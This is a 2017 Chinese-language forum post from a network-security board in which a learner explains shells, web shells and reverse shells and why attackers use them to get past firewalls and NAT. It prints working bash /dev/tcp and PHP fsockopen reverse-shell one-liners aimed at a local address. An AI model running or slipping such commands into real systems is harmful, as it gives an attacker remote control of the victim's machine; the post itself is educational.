2017.W47 - Reverse Shell > 已知用火 ## 前言 ## 最近终於愿意开始学习 Reverse Shell[0] 顺便学习一下各种 reverse shell 的写法 (不过还是有很多不会写 QQ) 终於进化到已知用火的阶段了 QQ ## 内容 ## Shell[1] 是介於作业系统跟使用者中间的一个介面程式 通常是命令式介面 (CLI)[2] 作业系统本身是不参与跟使用者的互动 Shell 本身可以做到很多系统底层的操作 以及呼叫外部程式、指令等 而 Web Shell 则是泛指透过 Web 介面 (BUI)[3] 一种操作方式 本身拥有的权限与网页伺服器[4] 一致 在 Ubuntu 中就可能是 www-data 权限 正常来说 Remote Shell 的连线方式是透过使用者端 主动连线到伺服器 这种使用情境符合大多数的情况 但是在少数情况 (e.g. 骇客入侵) 的时候 会因为防火墙原则或在 NAT[5] 之後 所以无法主动连线到受害者机器 因此发展出 reverse shell 的概念 也就是受害者机器主动发出网路连线的一种技巧 概念上来说 被控制端需要 1)主动发出网路连线 与 2)产生一个互动式介面 用 C 语言当做例子 就是要分别 1) 建立一个 socket 连线与 2) 呼叫一个 /bin/sh 的程式 使用 socket(AF_INET, SOCK_STREAM, 0) 建立一个 TCP 连线是个简单的方式 复杂的则可以实作 UDP / ICMP 等其他方式的网路连线 连线建立之後的 socket 就可以透过 dup2 将内容重导向到 stdin/stdout 接着执行 execv 来产生一个 bash shell 除了透过低阶程式之外 也可以直接使用 bash / Linux 的特性直接产生一个 reverse shell 在 Linux 下直接对档案 /dev/tcp/[IP]/[Port] [6] 做操作 这样就可以直接对外产生一个网路连线 并传送、接收指令 最後可以用以下指令快速产生一个 reverse shell /bin/bash -i >& /dev/tcp/127.0.0.1/34182 0>&1 相同的概念也可以透过 PHP 来实作 藉由 fsockopen [7] 快速产生一个 socket (并且预期 FD 是 3) 在用 exec 来执行跟 bash reverse shell 类似的指令 <?php $sk = fsockopen("127.0.0.1", 34182); exec("/bin/bash -i <&3 >&3 2>&3"); ?> [0]: https://stackoverflow.com/questions/35271850/what-is-reverse-shell [1]: https://zh.wikipedia.org/wiki/%E6%AE%BC%E5%B1%A4 [2]: https://en.wikipedia.org/wiki/Command-line_interface [3]: https://en.wikipedia.org/wiki/Browser_user_interface [4]: https://en.wikipedia.org/wiki/Web_server [5]: https://en.wikipedia.org/wiki/Network_address_translation [6]: http://www.tldp.org/LDP/abs/html/devref1.html [7]: http://php.net/manual/en/function.fsockopen.php --

※ 发信站: 批踢踢实业坊(ptt.cc), 来自: 123.193.122.171 ※ 文章网址: https://webptt.com/cn.aspx?n=bbs/NetSecurity/M.1511274995.A.F8F.html ※ 编辑: CMJ0121 (123.193.122.171), 11/21/2017 22:37:04